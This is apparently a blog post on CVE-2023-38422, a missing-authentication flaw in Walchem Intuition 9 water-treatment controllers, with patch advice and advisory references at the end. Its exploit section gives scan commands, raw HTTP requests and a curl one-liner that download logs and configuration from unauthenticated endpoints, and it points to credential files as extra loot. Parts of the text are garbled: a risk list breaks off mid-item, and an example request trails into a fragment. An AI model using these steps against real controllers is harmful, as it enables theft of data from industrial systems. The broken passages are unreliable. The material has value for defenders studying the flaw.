CVE-2023-38422 - How Missing Authentication in Walchem Intuition 9 Leaks Sensitive Data

---

Network-connected industrial controllers are everywhere. From water treatment to chemical dosing, specialized hardware keeps processes running, often managed through web interfaces. But what if that portal lets anyone in?

Today we’re diving deep into CVE-2023-38422, a vulnerability in Walchem Intuition 9 process controllers, impacting firmware prior to version 4.21. We’ll break down what went wrong, demonstrate how this bug can be exploited, and point you to the official references.

> In a nutshell:
> Some API routes in the Intuition 9’s web management server don’t require authentication. That means any attacker with network access could exfiltrate vital configuration, logs, and maybe even credentials, all while flying under the radar.

What Is The Walchem Intuition 9?

Walchem’s "Intuition 9" is an industrial controller for water treatment and process automation. It connects to process sensors and actuators, and provides a web portal for setup, monitoring, and exporting data (CSV logs, event histories, etc.).

Industrial devices aren’t known for rigorous web security—often, usability trumps defense. But missing authentication is a particularly serious slip.

The Vulnerability: CVE-2023-38422

Summary:
In firmware versions below 4.21, some HTTP API routes on the Intuition 9 web management server fail to check for valid logins. This means an unauthenticated remote user could directly access sensitive data endpoints.

Official Advisory:
- CISA ICS Advisory (ICSA-23-205-06)
- NVD entry for CVE-2023-38422

Exploit Details: How Attackers Can Steal Data

Let’s get to the good stuff: practical exploitation.

The web management server hosts "hidden" API endpoints used for exporting configuration and logs. Normally, these should *only* be available to logged-in users. Due to incomplete authentication checks, they are openly reachable!

Step 1: Find The Device

Attackers scan for open management ports (default: TCP 80 or 443, depending on config). Shodan and Censys routinely index exposed controllers—just search for product banners or unique HTTP headers.

nmap -p 80,443 --open --script http-title <target-network>

Step 2: Access An Export Endpoint

The endpoints often include paths like /export.csv, /download_logs, or /export_data.

For example, try

GET http://<CONTROLLER_IP>/export.csv HTTP/1.1
Host: <CONTROLLER_IP>

No authentication required! You get a direct download of configuration, calibration, or sensor logs.

Example cURL Exploit

curl -o data_export.csv http://192.168.1.100/export.csv

Result: Your local file data_export.csv now contains *sensitive internal logs*.

Step 3: (Optional) Grab More Goodies

Other unauthenticated endpoints have been observed, like event logs (/events.csv), configuration dumps (/export_config), and possibly files with user credentials (often hashed or obscured, but still valuable for attackers).

Example API Request

GET http://<CONTROLLER_IP>/export_config HTTP/1.1

Network configuration (IP, gateway, etc.)

Real-world risk:
Attackers can use the configuration data to
- Study the plant/process workflow,

Upgrade NOW:

Download Intuition 9 updates from Walchem

Monitor Logs:

Check for suspicious requests to export/download endpoints.

Further Reading

- CISA ICS Advisory ICSA-23-205-06
- National Vulnerability Database - CVE-2023-38422
- Walchem Intuition 9 Product Page (Upgrade links)

If you’re running industrial controls, patch your systems today—and keep sensitive interfaces locked down behind VPNs or strong firewalls. This is a classic example of why even simple authentication lapses in OT (operational technology) can have outsized impact.

Timeline

Published on: 08/23/2023 22:15:00 UTC
Last modified on: 09/05/2023 19:41:00 UTC